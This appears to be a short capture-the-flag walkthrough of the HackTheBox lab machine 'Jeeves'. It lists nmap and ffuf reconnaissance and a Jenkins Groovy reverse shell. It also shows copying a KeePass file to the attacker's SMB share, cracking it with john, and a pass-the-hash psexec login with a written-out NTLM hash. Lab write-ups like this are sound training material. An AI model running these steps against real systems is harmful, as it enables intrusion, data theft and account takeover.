Ping
Nmap default Scan
nmap 10.10.10.63 -oN dnmap
Nmap Script and Service scan
nmap 10.10.10.63 -sV -sC -A -oN snmap
Nmap All Port Scan
nmap -p- --min-rate 10000 10.10.10.63 -oN anmap
Directory traversal using ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63:50000/FUZZ -t 100 -o ffuf.txt
Nothing interesting port 80, so i go with port 50000 and found a directory /askjeeves
Will try that directory
Cool, we got something
There is a Build_Executor_Status>master>script console
Will run a groovy script to reverse shell:https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
Modified the script with my Ip and Port
run it.
Got reverse shell
Got user.txt
Will jump to Privilege Escalation…!
Will see Our Privileges
whoami /priv
Got impersonation, Cooool…!
System Info
User Info
Will Search for any interesting files
dir /S C:\users\*.kdbx *.log *.ini *.txt *.conf
Found .kdbx file
Will transfer it to our kali using smb share we already established
copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.14.2\kali
Received
I tried to open it is asking password, will crack it using john
keepass2john CEH.kdbx > ceh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ceh.hash
Got it…!
Will open the file now
There is an Ntlm hash for will try that with admin, using Pass the hash using psexec (Impacket)
Will copy that and use to Pass the Hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63
We are admin know…!
Will search for root.txt
Done with Jeeves…:)